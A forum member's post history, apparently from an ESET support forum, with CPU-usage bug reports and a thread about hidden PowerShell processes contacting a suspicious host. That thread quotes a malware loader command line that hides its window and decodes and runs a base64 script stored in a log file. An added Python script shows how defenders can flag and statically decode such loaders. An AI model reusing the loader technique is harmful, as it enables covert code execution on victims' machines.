Kevin999
Members
Posts: 43
Days Won: 1
Everything posted by Kevin999
-
BitComet utilizing too much CPU (about one CPU core, i.e. ~25%) is a known issue caused by BitComet's UDP transmission thread (BT DHT network, and maybe uTP), but egui.exe sometimes also utilizes ~25% on my computer (Intel Core i5-4690, 4 cores). The egui.exe CPU usage bug reproduced today; it happens when staying on the Network Connections page. I'll send you the log later.
-
This bug reproduced today. It also disappeared after restarting my computer. Apart from ekrn.exe costing >=50% CPU, Edge and IE couldn't open any website (always kept loading); although Firefox had been running for some time, it also couldn't open any website, and only IE could start again after exiting. These web browsers all still had processes after exiting, and they couldn't be terminated by Task Manager (access denied). Besides, ping works well.
-
This bug reproduced today. It also disappeared after restarting my computer. Apart from ekrn.exe costing >=50% CPU, Edge and IE couldn't open any website (always kept loading); because Firefox had been running for some time, it worked well, and only IE could start again after exiting. These web browsers all still had processes after exiting, and they couldn't be terminated by Task Manager (access denied). Besides, ping works well.
-
Two strange powershell processes (maybe coinminers?)
Kevin999 replied to Kevin999's topic in Malware Finding and Cleaning
How about only disabling the PS Remoting capability (especially incoming packets) in the EIS firewall by default? Because most users probably don't know how to use PowerShell. https://4sysops.com/wiki/disable-powershell-remoting-disable-psremoting-winrm-listener-firewall-and-localaccounttokenfilterpolicy/#disable-the-firewall-exceptions Besides, I think Windows Remote Management is rarely used by home users; the EIS firewall could also block it by default to provide higher security.
-
Two strange powershell processes (maybe coinminers?)
Kevin999 replied to Kevin999's topic in Malware Finding and Cleaning
I think ESET internet protection could block Windows Remote Management (WS-Management) by default (especially incoming packets), and add an option to allow it manually.
-
Two strange powershell processes (maybe coinminers?)
Kevin999 replied to Kevin999's topic in Malware Finding and Cleaning
What should I do? VMware Workstation 16 Pro (16.2.3 build-19376536) is installed on my computer.
-
Two strange powershell processes (maybe coinminers?)
Kevin999 replied to Kevin999's topic in Malware Finding and Cleaning
The threat was detected at 25 14:42:11 and 26 06:24:28 (after system start), but it was no longer detected after that.
-
Two strange powershell processes (maybe coinminers?)
Kevin999 replied to Kevin999's topic in Malware Finding and Cleaning
I also used ESET SysInspector to capture a snapshot; I can upload it if needed.
-
Yesterday, I found some strange internet traffic while I was using Wireshark. Then I used the EIS "Network Connections" tool and found it was created by PowerShell (I didn't run any PowerShell). This issue reproduced today. conhost.exe and powershell.exe were running in the background, but I didn't run either of them. PowerShell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday); conhost seems not to have had any network activity. I used Wireshark to capture packets, then used the filter ipv6.addr==2606:4700:3031::ac43:9c07, and found it was using HTTP/1.1 with the CONNECT method. Please note the strange strings in X-User-Agent. By the way, the TLS (TCP-443) and QUIC (UDP-443) connections were created when I used sandboxed Firefox to visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL to visit them !!!); these websites are using Cloudflare to protect themselves. I used ESET SysInspector to capture a snapshot.

I used nslookup to resolve:

C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1

DNS request timed out.
    timeout was 2 seconds.
*** 请求 UnKnown 超时

C:\Users\Admin>nslookup api.private-chatting.com
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1

非权威应答:
名称:    api.private-chatting.com
Addresses:  2606:4700:3032::6815:38d6
          2606:4700:3031::ac43:9c07
          104.21.56.214

__Today__ I found the command line parameters of one of the powershell.exe processes in Task Manager (it costs about 10% CPU):

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}

2. Find C:\Windows\logs\system-logs.txt, and find these strings:

Snipped: The code was moved to the attached file to squeeze the post.

Please note $EndPointURL = "hxxp://api.private-chatting.com/connect"; it's the same as the URL in the pcapng file.

Attachments: system-logs.txt, Strange traffic_20220424.rar, system-logs.rar
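The loader in the command line above has a recognisable shape: a hidden, non-interactive PowerShell that reads one line out of a file in a logs directory, base64-decodes it, and turns the result into a script block. The following Python is an added example (not from the original post, not ESET's code) of how a defender can triage process-creation records for that shape and statically decode the staged line to pull out the endpoint URL, without ever executing the script. The process events, the fake system-logs.txt and the placeholder URL `http://api.example.invalid/connect` are all constructed for the example; the one suspicious command line is the one quoted in the post, and `MIN_INDICATORS = 3` is an arbitrary threshold chosen here.

```python
import base64
import re

# Indicators drawn from the loader command line quoted in the post above.
LOADER_INDICATORS = [
    ("hidden_window",       re.compile(r"-WindowStyle\s+Hidden", re.I)),
    ("noninteractive",      re.compile(r"-NonInteractive", re.I)),
    ("payload_from_file",   re.compile(r"Get-Content\s+\S+\s*\|\s*Select\s+-Index\s+\d+", re.I)),
    ("base64_decode",       re.compile(r"FromBase64String", re.I)),
    ("dynamic_scriptblock", re.compile(r"\[Scriptblock\]::Create|Invoke-Expression|\bIEX\b", re.I)),
]
MIN_INDICATORS = 3  # assumption: three or more co-occurring indicators is worth a closer look

URL_RX = re.compile(r"https?://[^\s\"';]+", re.I)


def score_command_line(cmdline):
    """Return the names of the loader indicators present in one process command line."""
    return [name for name, rx in LOADER_INDICATORS if rx.search(cmdline)]


def payload_location(cmdline):
    """Extract (path, line index) from 'Get-Content <path> | Select -Index N'; Select -Index is zero-based."""
    m = re.search(r"Get-Content\s+(\S+)\s*\|\s*Select\s+-Index\s+(\d+)", cmdline, re.I)
    return (m.group(1), int(m.group(2))) if m else None


def decode_payload_line(file_text, index):
    """Decode the base64 line the loader would select, as text only; nothing is executed."""
    lines = file_text.splitlines()
    if index >= len(lines):
        return None
    try:
        return base64.b64decode(lines[index], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events, files):
    """Flag PowerShell events that match the file-staged loader and pull URLs from the staged script.

    events: list of {"pid": int, "image": str, "cmdline": str}
    files:  dict mapping a file path, as written in the command line, to that file's text
    """
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith("powershell.exe"):
            continue
        hits = score_command_line(ev["cmdline"])
        if len(hits) < MIN_INDICATORS:
            continue
        finding = {"pid": ev["pid"], "indicators": hits, "payload": None, "urls": []}
        loc = payload_location(ev["cmdline"])
        if loc and loc[0] in files:
            decoded = decode_payload_line(files[loc[0]], loc[1])
            if decoded is not None:
                finding["payload"] = loc
                finding["urls"] = URL_RX.findall(decoded)
        findings.append(finding)
    return findings


# --- Constructed sample data (not from the original post) -------------------
# A harmless stand-in for the staged script: one variable assignment with a placeholder URL.
STAGED_SCRIPT = '$EndPointURL = "http://api.example.invalid/connect";\nStart-Sleep 5'
PAYLOAD_INDEX = 17033  # the line index used in the quoted command line


def build_sample_log():
    """Build a fake system-logs.txt: filler lines with one base64 line at PAYLOAD_INDEX."""
    lines = ["2022-04-24 00:00:00 INFO heartbeat ok"] * (PAYLOAD_INDEX + 1)
    lines[PAYLOAD_INDEX] = base64.b64encode(STAGED_SCRIPT.encode("utf-8")).decode("ascii")
    return "\n".join(lines) + "\n"


SAMPLE_FILES = {r"C:\Windows\logs\system-logs.txt": build_sample_log()}

SAMPLE_EVENTS = [
    {"pid": 1201, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -Command "Get-Date"'},
    {"pid": 4412, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive '
                 r'-WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{'
                 r'$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; '
                 r'Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;'
                 r'$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); '
                 r'$script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}')},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS, SAMPLE_FILES):
        print(finding)
```

The point of `decode_payload_line` is that the staged line is treated as data: it is base64-decoded and searched for URLs, never passed to PowerShell. On a real host the `events` list would come from Sysmon Event ID 1 or Security 4688 records and `files` from copies of the referenced paths taken off the machine.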
-
Now I'm using Windows 10 Enterprise LTSC 2022 x64 (21H2). This bug even happened when I was using Windows 10 Enterprise LTSC 2019 x64 (1809); my Windows was a clean upgrade (I deleted the system partition, EFI system partition and recovery partition), so I can confirm I have tried a complete clean install of ESET.
-
This bug reproduced today. It also disappeared after restarting my computer. Apart from ekrn.exe costing >=50% CPU, IE couldn't open any website (always kept loading), and Firefox and Edge couldn't launch (they have processes). I will send you the dump later. By the way, I ran ESET Log Collector after restarting the computer, though the dump was created first.
-
This bug reproduced today. It also disappeared after restarting my computer. Apart from ekrn.exe costing >=50% CPU, IE and Edge couldn't open any website (always kept loading); Firefox is OK. I will send you the dump later. By the way, I ran ESET Log Collector after restarting the computer, though the dump was created first.